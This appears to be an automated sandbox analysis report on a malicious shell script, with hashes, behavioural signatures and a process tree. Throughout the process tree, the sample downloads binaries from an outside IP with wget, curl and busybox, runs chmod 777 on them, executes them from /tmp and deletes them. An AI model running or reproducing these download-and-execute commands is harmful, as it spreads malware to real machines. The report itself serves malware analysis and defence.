Analysis
-
max time kernel
79s -
max time network
78s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
-
Size
10KB
-
MD5
bd36c3851a123cb041ac845fb2a97f33
-
SHA1
276091f6814de9b87d827fb423a0a158a37cd4a1
-
SHA256
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b
-
SHA512
ec36ea0baa72b2766fd4fdc90e029bb9421585299ce786b8d8d82f3ab5f0233385a8d06f9bfe0e65de636791cd75cd93617e8064c7343b4149e79aee2a1ed382
-
SSDEEP
192:Clp+dd0Rym0tDBRD+PDRJP1t6gFC2VymEDBRD+PDRJPG2a6Vlp+ddZ:U0lb+1tzF5sb+VaN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh1⤵PID:739
-
/bin/rm/bin/rm bins.sh2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:767
-
-
/bin/chmodchmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:775
-
-
/bin/chmodchmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:784
-
-
/bin/chmodchmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:815
-
-
/bin/chmodchmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:838
-
-
/bin/chmodchmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:852
-
-
/bin/chmodchmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:883
-
-
/bin/chmodchmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:889
-
-
/bin/chmodchmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:895
-
-
/bin/chmodchmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:901
-
-
/bin/chmodchmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:907
-
-
/bin/chmodchmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:913
-
-
/bin/chmodchmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:919
-
-
/bin/chmodchmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:925
-
-
/bin/chmodchmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:931
-
-
/bin/chmodchmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:937
-
-
/bin/chmodchmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:943
-
-
/bin/chmodchmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:949
-
-
/bin/chmodchmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:955
-
-
/bin/chmodchmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:961
-
-
/bin/chmodchmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:967
-
-
/bin/chmodchmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:973
-
-
/bin/chmodchmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:979
-
-
/bin/chmodchmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:982
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:983
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:985
-
-
/bin/chmodchmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:988
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:989
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:991
-
-
/bin/chmodchmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:994
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:995
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:997
-
-
/bin/chmodchmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- File and Directory Permissions Modification
PID:998
-
-
/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Executes dropped EXE
PID:999
-
-
/bin/rmrm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:1000
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:1001
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1002
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:1003
-
-
/bin/chmodchmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:1006
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:1007
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:1009
-
-
/bin/chmodchmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:1012
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97